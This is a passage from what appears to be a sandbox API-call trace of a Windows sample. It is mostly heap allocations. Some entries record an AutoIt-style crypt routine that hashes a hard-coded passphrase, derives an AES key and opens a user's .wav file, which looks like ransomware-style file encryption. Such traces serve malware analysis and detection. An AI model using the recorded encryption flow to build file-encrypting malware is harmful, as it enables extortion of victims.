dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0110.177] CloseHandle (hObject=0x298) returned 1 [0110.178] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.178] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0110.178] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cde5630, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0xe537d520, ftLastAccessTime.dwHighDateTime=0x1d5e3cd, ftLastWriteTime.dwLowDateTime=0xe537d520, ftLastWriteTime.dwHighDateTime=0x1d5e3cd, nFileSizeHigh=0x0, nFileSizeLow=0xe295, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="fR5QK.wav", cAlternateFileName="")) returned 0x41ac600 [0110.178] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0110.178] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0110.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0110.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0110.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0110.246] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0110.246] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0110.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.247] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0110.247] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.247] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca1f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0110.247] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.247] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0110.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0110.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca2b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0110.248] CryptHashData (hHash=0x41ac600, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0110.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.248] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0110.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca190, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0110.248] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0110.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0110.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0110.248] CryptDestroyHash (hHash=0x41ac600) returned 1 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0110.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9578 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0110.249] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0110.249] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0110.249] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0110.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav" (normalized: "c:\\users\\fd1hvy\\music\\fr5qk.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0110.250] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.250] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0110.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.251] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0110.251] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0110.251] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0110.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0110.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0110.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0110.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.252] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 